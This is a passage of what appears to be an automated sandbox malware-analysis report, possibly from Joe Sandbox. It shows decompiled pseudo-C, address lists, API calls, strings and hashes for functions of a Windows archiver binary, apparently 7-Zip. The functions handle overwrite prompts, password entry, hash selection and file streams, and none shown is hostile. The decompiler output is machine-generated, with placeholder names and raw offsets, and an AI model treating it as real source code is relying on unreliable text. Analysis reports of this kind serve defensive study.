										__ecx =  *((intOrPtr*)(__esi + 0xc8));
										L003B1F91( *((intOrPtr*)(__esi + 0xc8)));
									}
								}
								E003E571F();
								goto L1;
							case 5:
								_t50 = 0x80004004;
								L17:
								LeaveCriticalSection(0x43a878);
								return _t50;
							case 6:
								goto L16;
						}
					}
				}
				L1:
				_t50 = _t23;
				goto L17;
			}









                                                                                                    0x003e46dc
                                                                                                    0x003e46e2
                                                                                                    0x003e46e9
                                                                                                    0x003e46f2
                                                                                                    0x003e46f8
                                                                                                    0x003e46fd
                                                                                                    0x003e4705
                                                                                                    0x003e4709
                                                                                                    0x003e471b
                                                                                                    0x003e472e
                                                                                                    0x003e4740
                                                                                                    0x003e4753
                                                                                                    0x003e4753
                                                                                                    0x003e475e
                                                                                                    0x003e4767
                                                                                                    0x003e47d6
                                                                                                    0x003e47d6
                                                                                                    0x00000000
                                                                                                    0x003e4769
                                                                                                    0x003e4769
                                                                                                    0x00000000
                                                                                                    0x003e479b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e477a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e4790
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e4785
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e47a3
                                                                                                    0x003e47a9
                                                                                                    0x003e47a9
                                                                                                    0x003e47b1
                                                                                                    0x003e47b3
                                                                                                    0x003e47bf
                                                                                                    0x003e47c1
                                                                                                    0x003e47c7
                                                                                                    0x003e47c7
                                                                                                    0x003e47bf
                                                                                                    0x003e47cc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e4770
                                                                                                    0x003e47db
                                                                                                    0x003e47dc
                                                                                                    0x003e47e7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e4769
                                                                                                    0x003e4767
                                                                                                    0x003e46eb
                                                                                                    0x003e46eb
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(0043A878), ref: 003E46DC
                                                                                                    • fputs.MSVCRT ref: 003E471B
                                                                                                    • fputs.MSVCRT ref: 003E4740
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A878), ref: 003E47DC
                                                                                                    Strings
                                                                                                    • with the file from archive:, xrefs: 003E473B
                                                                                                    • Would you like to replace the existing file:, xrefs: 003E4716
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionfputs$EnterLeave
                                                                                                    • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                    • API String ID: 3346953513-686978020
                                                                                                    • Opcode ID: 1386616ad1f93d2cc5561e55df3a81c580780de813185c77ed723d78286c52a6
                                                                                                    • Instruction ID: 9c194b3c2a2bd016bfc82922257d8a7d3325c1b3fb03e866ff9adc41aa168105
                                                                                                    • Opcode Fuzzy Hash: 1386616ad1f93d2cc5561e55df3a81c580780de813185c77ed723d78286c52a6
                                                                                                    • Instruction Fuzzy Hash: AB31C0752002A4DFDB12AF62DC80BEA77A5EF4D310F120316F92A5B2D0CB35AC51DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E5001 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E003E5001(struct _IO_FILE** __ecx, void* __edx, void* __eflags) {
				signed int _t30;
				char* _t32;
				char* _t36;
				void* _t41;
				struct _IO_FILE** _t45;
				void* _t66;
				intOrPtr _t69;
				signed int _t70;
				void* _t73;

				E0041F1B0(E00426014, _t73);
				_t69 =  *((intOrPtr*)(_t73 + 8));
				_t45 = __ecx;
				_t66 = __edx;
				fputs("WARNING:\n",  *__ecx);
				E003B210C(_t69 + 0x18);
				E003B2D47(_t73 - 0x18);
				_t30 =  *(_t69 + 0x84);
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t79 =  *(_t69 + 0x3c) - _t30;
				if( *(_t69 + 0x3c) != _t30) {
					__eflags = _t30;
					if(_t30 >= 0) {
						_t32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t66 + 8)) + _t30 * 4)) + 0x10));
					} else {
						_t32 = "#";
					}
					E003E50DB(_t73 - 0x18, "Cannot open the file", _t32);
					_t70 =  *(_t69 + 0x3c);
					__eflags = _t70;
					if(__eflags >= 0) {
						_t36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t66 + 8)) + _t70 * 4)) + 0x10));
					} else {
						_t36 = "#";
					}
					E003E50DB(_t73 - 0x18, "The file is open", _t36);
				} else {
					E003B30B5(_t73 - 0x18);
					E003B3164(_t73 - 0x18, "The archive is open with offset");
				}
				_push( *((intOrPtr*)(_t73 - 0x18)));
				E003B1FA0(L003B1FB3(_t45, _t79));
				_t41 = E003B1E40(E003B1FA0(_t38),  *((intOrPtr*)(_t73 - 0x18)));
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return _t41;
			}












                                                                                                    0x003e5006
                                                                                                    0x003e5010
                                                                                                    0x003e5013
                                                                                                    0x003e5016
                                                                                                    0x003e501f
                                                                                                    0x003e502d
                                                                                                    0x003e5035
                                                                                                    0x003e503a
                                                                                                    0x003e5040
                                                                                                    0x003e5044
                                                                                                    0x003e5047
                                                                                                    0x003e5060
                                                                                                    0x003e5062
                                                                                                    0x003e5071
                                                                                                    0x003e5064
                                                                                                    0x003e5064
                                                                                                    0x003e5064
                                                                                                    0x003e507d
                                                                                                    0x003e5082
                                                                                                    0x003e5085
                                                                                                    0x003e5087
                                                                                                    0x003e5096
                                                                                                    0x003e5089
                                                                                                    0x003e5089
                                                                                                    0x003e5089
                                                                                                    0x003e50a2
                                                                                                    0x003e5049
                                                                                                    0x003e504c
                                                                                                    0x003e5059
                                                                                                    0x003e5059
                                                                                                    0x003e50a7
                                                                                                    0x003e50b5
                                                                                                    0x003e50c4
                                                                                                    0x003e50d0
                                                                                                    0x003e50d8

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologfputs
                                                                                                    • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                    • API String ID: 1798449854-1259944392
                                                                                                    • Opcode ID: bf9823cffc892948e6b022f6f600c6edaf6d585714e1ede09e84404b8458b98a
                                                                                                    • Instruction ID: 9e13645d3aa9fb5c095e5dcf47b8a26f940ec32fd50c3d1f83428cbee45f507e
                                                                                                    • Opcode Fuzzy Hash: bf9823cffc892948e6b022f6f600c6edaf6d585714e1ede09e84404b8458b98a
                                                                                                    • Instruction Fuzzy Hash: BC21C831700924DFCB06EB55D492AFEB3B4EF44318F50422AF6029BA91DB74AD45CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003ECC9E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 89%
                                                                                                    			E003ECC9E(void* __ebx, struct _IO_FILE** __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v5;
				long _v12;
				struct _IO_FILE** _v16;
				intOrPtr _v20;
				void* __ebp;
				void* _t16;
				void* _t29;
				signed int _t30;
				void* _t41;
				struct _IO_FILE** _t44;
				signed int _t52;

				_t29 = __ebx;
				_t44 = __ecx;
				_v20 = __edx;
				_v16 = __ecx;
				if(__ecx != 0) {
					fputs("\nEnter password (will not be echoed):",  *__ecx);
					L003B1F91(_t44);
				}
				_push(_t29);
				_t16 = GetStdHandle(0xfffffff6);
				_v12 = _v12 & 0x00000000;
				_t41 = _t16;
				_t30 = 0;
				if(_t41 != 0xffffffff && _t41 != 0 && GetConsoleMode(_t41,  &_v12) != 0) {
					_t8 = SetConsoleMode(_t41, _v12 & 0x000000fb) != 0;
					_t52 = _t8;
					_t30 = 0 | _t8;
				}
				_push(_v20);
				_v5 = L003B1EC8(0x43a598, _t52);
				if(_t30 != 0) {
					SetConsoleMode(_t41, _v12);
				}
				if(_v16 != 0) {
					E003B1FA0(_v16);
					L003B1F91(_v16);
				}
				return _v5;
			}














                                                                                                    0x003ecc9e
                                                                                                    0x003ecca5
                                                                                                    0x003eccaa
                                                                                                    0x003eccad
                                                                                                    0x003eccb0
                                                                                                    0x003eccb9
                                                                                                    0x003eccc3
                                                                                                    0x003eccc3
                                                                                                    0x003eccc8
                                                                                                    0x003ecccb
                                                                                                    0x003eccd1
                                                                                                    0x003eccdb
                                                                                                    0x003eccdd
                                                                                                    0x003ecce2
                                                                                                    0x003ecd02
                                                                                                    0x003ecd02
                                                                                                    0x003ecd02
                                                                                                    0x003ecd02
                                                                                                    0x003ecd05
                                                                                                    0x003ecd14
                                                                                                    0x003ecd18
                                                                                                    0x003ecd1e
                                                                                                    0x003ecd1e
                                                                                                    0x003ecd26
                                                                                                    0x003ecd2b
                                                                                                    0x003ecd33
                                                                                                    0x003ecd33
                                                                                                    0x003ecd3c

                                                                                                    APIs
                                                                                                    • fputs.MSVCRT ref: 003ECCB9
                                                                                                      • Part of subcall function 003B1F91: fflush.MSVCRT ref: 003B1F93
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 003ECCCB
                                                                                                    • GetConsoleMode.KERNEL32(00000000,00000000), ref: 003ECCED
                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 003ECCFE
                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 003ECD1E
                                                                                                    Strings
                                                                                                    • Enter password (will not be echoed):, xrefs: 003ECCB4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleMode$Handlefflushfputs
                                                                                                    • String ID: Enter password (will not be echoed):
                                                                                                    • API String ID: 108775803-3720017889
                                                                                                    • Opcode ID: bc93466efceb3a951d10e689fb81c9cbd553a54e60df67dbae4d3c74ec424594
                                                                                                    • Instruction ID: eec05d62b0e2e6021333b07f0de51de57199a8a3585ee40c9447c2c1d02b00a0
                                                                                                    • Opcode Fuzzy Hash: bc93466efceb3a951d10e689fb81c9cbd553a54e60df67dbae4d3c74ec424594
                                                                                                    • Instruction Fuzzy Hash: 54110D31A00229ABCB125BA99C11BFE7FB99F45764F554265E810671D0CB315D07CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D49FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E003D49FC(void* __ebx, void* __ecx, void* __edx) {
				void* _t13;
				void* _t15;
				void* _t16;
				void* _t19;
				void* _t34;
				char* _t38;
				void* _t40;

				_t19 = __ebx;
				_t13 = E0041F1B0(E00424D40, _t40);
				_t34 = __ecx;
				if(__edx != 0x20) {
					if(__edx != 0x14) {
						if(__edx != 0x10) {
							if(__edx != 8) {
								if(__edx != 4) {
									L12:
									 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
									return _t13;
								}
								_t38 = "crc32";
								L10:
								_push(_t19);
								E003B26B2(_t40 - 0x20, _t38);
								 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
								_t15 = E003BA5CE(_t40 - 0x14);
								 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
								_t13 = E003B1E40(_t15,  *((intOrPtr*)(_t40 - 0x20)));
								if(_t15 != 0) {
									_t16 = E003B2DCD(_t40 - 0x2c, _t38);
									 *(_t40 - 4) = 1;
									E003EF23F(_t34);
									_push(_t16);
									_t13 = E003B1E40(E003B1524(_t34),  *((intOrPtr*)(_t40 - 0x2c)));
								}
								goto L12;
							}
							_t38 = 0x42af34;
							goto L10;
						}
						_t38 = 0x42af44;
						goto L10;
					}
					_t38 = 0x42af48;
					goto L10;
				}
				_t38 = "sha256";
				goto L10;
			}










                                                                                                    0x003d49fc
                                                                                                    0x003d4a01
                                                                                                    0x003d4a0e
                                                                                                    0x003d4a10
                                                                                                    0x003d4a1c
                                                                                                    0x003d4a28
                                                                                                    0x003d4a34
                                                                                                    0x003d4a40
                                                                                                    0x003d4a9d
                                                                                                    0x003d4aa2
                                                                                                    0x003d4aaa
                                                                                                    0x003d4aaa
                                                                                                    0x003d4a42
                                                                                                    0x003d4a47
                                                                                                    0x003d4a47
                                                                                                    0x003d4a4c
                                                                                                    0x003d4a51
                                                                                                    0x003d4a5a
                                                                                                    0x003d4a5f
                                                                                                    0x003d4a68
                                                                                                    0x003d4a71
                                                                                                    0x003d4a77
                                                                                                    0x003d4a80
                                                                                                    0x003d4a87
                                                                                                    0x003d4a8e
                                                                                                    0x003d4a97
                                                                                                    0x003d4a9c
                                                                                                    0x00000000
                                                                                                    0x003d4a71
                                                                                                    0x003d4a36
                                                                                                    0x00000000
                                                                                                    0x003d4a36
                                                                                                    0x003d4a2a
                                                                                                    0x00000000
                                                                                                    0x003d4a2a
                                                                                                    0x003d4a1e
                                                                                                    0x00000000
                                                                                                    0x003d4a1e
                                                                                                    0x003d4a12
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: crc32$crc64$md5$sha1$sha256
                                                                                                    • API String ID: 3519838083-3826973078
                                                                                                    • Opcode ID: f0037647464510a327bd18dc5009138aa2d797f0d88a1f67ab6dc1226480a475
                                                                                                    • Instruction ID: 52f77c4ce239dfe5940a1de03ed84842b33bb80ac0f44ea676ebb8d9e94abe7f
                                                                                                    • Opcode Fuzzy Hash: f0037647464510a327bd18dc5009138aa2d797f0d88a1f67ab6dc1226480a475
                                                                                                    • Instruction Fuzzy Hash: 39114CB3F8106097CF23A6A4B9415ED727A9BD5328F658137E8157B781CB380E44929A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B669A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B669A() {
				struct HINSTANCE__* _t10;

				_t10 = GetModuleHandleA("kernel32.dll");
				 *0x43a5cc = GetProcAddress(_t10, "FindFirstStreamW");
				 *0x43a5c8 = GetProcAddress(_t10, "FindNextStreamW");
				return 0x43a5c4;
			}




                                                                                                    0x003b66bf
                                                                                                    0x003b66cf
                                                                                                    0x003b66d6
                                                                                                    0x003b66e0

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003B66B3
                                                                                                    • GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 003B66C7
                                                                                                    • GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 003B66D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                    • API String ID: 667068680-4044117955
                                                                                                    • Opcode ID: 7354af7f67d73b7d498a31233b51c9cf148c224736ea90c1e1451780a4bcb63e
                                                                                                    • Instruction ID: 7eefca27e2700728787585988cd11831f47731380632b8369935e9624539ee63
                                                                                                    • Opcode Fuzzy Hash: 7354af7f67d73b7d498a31233b51c9cf148c224736ea90c1e1451780a4bcb63e
                                                                                                    • Instruction Fuzzy Hash: 7BE0CD717842207F67107B667C4DDB5ABECE5A4761760007FF501D3390C5B80C124A6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F0B53 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 468COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E003F0B53(intOrPtr* __ecx) {
				intOrPtr* _t237;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				signed int _t256;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				void* _t269;
				void* _t270;
				void* _t272;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t285;
				signed int _t289;
				intOrPtr* _t291;
				signed int _t302;
				signed int _t304;
				signed int _t305;
				signed int _t313;
				intOrPtr _t316;
				signed int _t318;
				intOrPtr* _t323;
				signed int _t342;
				signed int _t350;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				intOrPtr _t391;
				intOrPtr _t407;
				short* _t418;
				short* _t422;
				signed int _t446;
				signed int _t447;
				intOrPtr* _t448;
				intOrPtr* _t450;
				void* _t452;

				E0041F1B0(E00426E4E, _t452);
				_t450 = __ecx;
				_push(__ecx);
				 *((intOrPtr*)( *__ecx + 0x10))();
				_t237 =  *((intOrPtr*)(_t452 + 0xc));
				if(_t237 == 0) {
					L63:
					_t238 = 1;
					L64:
					 *[fs:0x0] =  *((intOrPtr*)(_t452 - 0xc));
					return _t238;
				}
				 *(_t452 - 0x14) = 0;
				 *(_t452 - 4) = 0;
				 *((intOrPtr*)( *_t237))(_t237, 0x42d0b0, _t452 - 0x14);
				if( *(_t452 - 0x14) == 0) {
					goto L63;
				}
				E003B2D47(_t452 - 0x34);
				 *((short*)(_t452 - 0x8c)) = 0;
				 *((short*)(_t452 - 0x8a)) = 0;
				 *((intOrPtr*)(_t452 - 0x84)) = 0;
				_t241 =  *(_t452 - 0x14);
				_t354 = 2;
				 *(_t452 - 4) = _t354;
				_t242 =  *((intOrPtr*)( *_t241 + 0xc))(_t241, 4, _t452 - 0x8c);
				 *(_t452 - 0x24) = _t242;
				if(_t242 == 0) {
					__eflags =  *((short*)(_t452 - 0x8c)) - 8;
					if( *((short*)(_t452 - 0x8c)) == 8) {
						E003B2ECB(_t452 - 0x34,  *((intOrPtr*)(_t452 - 0x84)));
						 *(_t452 - 4) = 1;
						E003B92C9(_t452 - 0x8c);
						_t34 = E003B3232(_t452 - 0x34, 0x2e) + 1; // 0x1
						E003C47D5(_t452 - 0x34, _t452 - 0x58, _t34);
						 *(_t452 - 4) = 3;
						E003B2D8A(_t452 - 0x40,  *((intOrPtr*)(_t452 - 0x34)) + _t34 * 2);
						 *(_t452 - 4) = 4;
						E003B2E5F(_t452 - 0x20, __eflags, _t452 - 0x40);
						 *(_t452 - 4) = 5;
						E003B2285( *((intOrPtr*)(_t452 - 0x20)));
						E003B2D47(_t452 - 0x74);
						 *(_t452 - 4) = 6;
						E003B2D47(_t452 - 0x68);
						_t256 =  *(_t452 - 0x1c);
						 *(_t452 - 0xd) =  *(_t452 - 0xd) & 0x00000000;
						__eflags = _t256 - _t354;
						 *(_t452 - 4) = 7;
						_t446 = _t354;
						if(_t256 < _t354) {
							L60:
							E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t256,  *((intOrPtr*)(_t452 - 0x68))),  *((intOrPtr*)(_t452 - 0x74))),  *((intOrPtr*)(_t452 - 0x20))),  *((intOrPtr*)(_t452 - 0x40))),  *((intOrPtr*)(_t452 - 0x58))),  *((intOrPtr*)(_t452 - 0x34)));
							_t263 =  *(_t452 - 0x14);
							 *(_t452 - 4) =  *(_t452 - 4) | 0xffffffff;
							__eflags = _t263;
							L61:
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t263 + 8))(_t263);
							}
							goto L63;
						}
						_t265 = E003B23AC( *((intOrPtr*)(_t452 - 0x20)) + _t256 * 2 - 4, 0x42e850);
						__eflags = _t265;
						if(_t265 == 0) {
							_t256 =  *(_t452 - 0x1c);
							__eflags = _t256 - _t354;
							if(_t256 < _t354) {
								goto L60;
							}
							_t266 = E003B23AC( *((intOrPtr*)(_t452 - 0x20)) + _t256 * 2 - 4, 0x42e84c);
							__eflags = _t266;
							if(_t266 != 0) {
								L18:
								_t256 =  *(_t452 - 0x1c);
								__eflags = _t256 - _t354;
								if(_t256 <= _t354) {
									L22:
									__eflags = _t446 - _t256;
									if(_t446 != _t256) {
										goto L60;
									}
									L23:
									_t269 = E003C47D5(_t452 - 0x40, _t452 - 0x98, _t256 - _t446);
									 *(_t452 - 4) = 8;
									_t270 = E003B2CEC(_t452 - 0x4c, _t452 - 0x58, _t269);
									 *(_t452 - 4) = 9;
									_t272 = E003B1E40(E003B2F2F(_t452 - 0x74, _t270),  *((intOrPtr*)(_t452 - 0x4c)));
									 *(_t452 - 4) = 7;
									E003B1E40(_t272,  *((intOrPtr*)(_t452 - 0x98)));
									E003B2ECB(_t452 - 0x68,  *((intOrPtr*)(_t452 - 0x40)) + ( *((intOrPtr*)(_t452 - 0x3c)) - _t446) * 2);
									 *((char*)(_t452 - 0x5c)) =  *(_t452 - 0xd);
									_t279 =  *((intOrPtr*)(_t452 - 0x54));
									__eflags = _t279 - 1;
									if(_t279 >= 1) {
										__eflags = _t279 - 1;
										E003B2F87(_t450 + 0x24,  *((intOrPtr*)(_t452 - 0x58)), _t279 - 1);
									} else {
										E003B302D(_t450 + 0x24, "file");
									}
									_t355 =  *(_t452 + 8);
									_t447 = L003BFC7E(_t355, _t452 - 0x7c);
									__eflags = _t447;
									if(_t447 == 0) {
										_t283 =  *((intOrPtr*)(_t452 - 0x7c));
										 *((intOrPtr*)(_t450 + 0x30)) =  *((intOrPtr*)(_t450 + 0x30)) + _t283;
										_t448 = _t450 + 0x18;
										 *(_t452 - 0x24) =  *(_t452 - 0x78);
										 *((intOrPtr*)(_t452 - 0x28)) = _t283;
										asm("adc [esi+0x34], ecx");
										L00403F6D(_t448);
										_t285 =  *(_t448 + 4);
										__eflags = _t355;
										 *(_t452 + 8) = _t355;
										 *(_t448 + 4) = _t285 + 1;
										_t391 =  *_t448;
										 *((intOrPtr*)(_t391 + _t285 * 8)) =  *((intOrPtr*)(_t452 - 0x28));
										 *(_t391 + 4 + _t285 * 8) =  *(_t452 - 0x24);
										if(_t355 != 0) {
											 *((intOrPtr*)( *_t355 + 4))(_t355);
										}
										 *(_t452 - 4) = 0xa;
										E003EF23F(_t450 + 0xc);
										L003F19CC(_t450 + 0xc, _t452 + 8);
										_t289 =  *(_t452 + 8);
										 *(_t452 - 4) = 7;
										__eflags = _t289;
										if(_t289 != 0) {
											 *((intOrPtr*)( *_t289 + 8))(_t289);
										}
										 *(_t452 - 0x24) =  *(_t452 - 0x24) & 0x00000000;
										 *((intOrPtr*)(_t452 - 0x28)) =  *((intOrPtr*)(_t450 + 0x10));
										_t291 =  *((intOrPtr*)(_t452 + 0xc));
										_t357 =  *((intOrPtr*)( *_t291 + 0x10))(_t291, _t452 - 0x28, 0);
										__eflags = _t357;
										if(_t357 == 0) {
											E003B2D47(_t452 - 0x4c);
											while(1) {
												_push(_t452 - 0x4c);
												 *(_t452 - 4) = 0xb;
												_t295 = E003F1125(_t452 - 0x74);
												__eflags = _t295;
												if(_t295 == 0) {
													break;
												}
												 *(_t452 + 8) =  *(_t452 + 8) & 0x00000000;
												_t304 =  *(_t452 - 0x14);
												 *(_t452 - 4) = 0xc;
												_t357 =  *((intOrPtr*)( *_t304 + 0x10))(_t304,  *((intOrPtr*)(_t452 - 0x4c)), _t452 + 8);
												__eflags = _t357 - 1;
												if(_t357 == 1) {
													_t295 =  *(_t452 + 8);
													 *(_t452 - 4) = 0xb;
													__eflags = _t295;
													if(_t295 != 0) {
														_t295 =  *((intOrPtr*)( *_t295 + 8))(_t295);
													}
													break;
												}
												__eflags = _t357;
												if(_t357 != 0) {
													L53:
													_t305 =  *(_t452 + 8);
													 *(_t452 - 4) = 0xb;
													L54:
													__eflags = _t305;
													if(_t305 != 0) {
														_t305 =  *((intOrPtr*)( *_t305 + 8))(_t305);
													}
													E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(E003B1E40(_t305,  *((intOrPtr*)(_t452 - 0x4c))),  *((intOrPtr*)(_t452 - 0x68))),  *((intOrPtr*)(_t452 - 0x74))),  *((intOrPtr*)(_t452 - 0x20))),  *((intOrPtr*)(_t452 - 0x40))),  *((intOrPtr*)(_t452 - 0x58))),  *((intOrPtr*)(_t452 - 0x34)));
													goto L57;
												}
												_t403 =  *(_t452 + 8);
												__eflags =  *(_t452 + 8);
												if( *(_t452 + 8) == 0) {
													break;
												}
												_t357 = L003BFC7E(_t403, _t452 - 0x7c);
												__eflags = _t357;
												if(_t357 != 0) {
													goto L53;
												}
												_t316 =  *((intOrPtr*)(_t452 - 0x7c));
												 *((intOrPtr*)(_t450 + 0x30)) =  *((intOrPtr*)(_t450 + 0x30)) + _t316;
												 *(_t452 - 0x24) =  *(_t452 - 0x78);
												asm("adc [esi+0x34], ecx");
												L00403F6D(_t448);
												_t318 =  *(_t448 + 4);
												 *(_t448 + 4) = _t318 + 1;
												_t407 =  *_t448;
												 *((intOrPtr*)(_t407 + _t318 * 8)) = _t316;
												 *(_t407 + 4 + _t318 * 8) =  *(_t452 - 0x24);
												E003EF23F(_t450 + 0xc);
												L003F19CC(_t450 + 0xc, _t452 + 8);
												 *(_t452 - 0x90) =  *(_t452 - 0x90) & 0x00000000;
												 *((intOrPtr*)(_t452 - 0x94)) =  *((intOrPtr*)(_t450 + 0x10));
												_t323 =  *((intOrPtr*)(_t452 + 0xc));
												_t357 =  *((intOrPtr*)( *_t323 + 0x10))(_t323, _t452 - 0x94, 0);
												_t305 =  *(_t452 + 8);
												__eflags = _t357;
												 *(_t452 - 4) = 0xb;
												if(_t357 != 0) {
													goto L54;
												}
												__eflags = _t305;
												if(_t305 != 0) {
													_t305 =  *((intOrPtr*)( *_t305 + 8))(_t305);
												}
												 *(_t452 - 4) = 7;
												E003B1E40(_t305,  *((intOrPtr*)(_t452 - 0x4c)));
												E003B2D47(_t452 - 0x4c);
											}
											_t256 = E003B1E40(_t295,  *((intOrPtr*)(_t452 - 0x4c)));
											__eflags =  *((intOrPtr*)(_t450 + 0x10)) - 1;
											if( *((intOrPtr*)(_t450 + 0x10)) != 1) {
												L50:
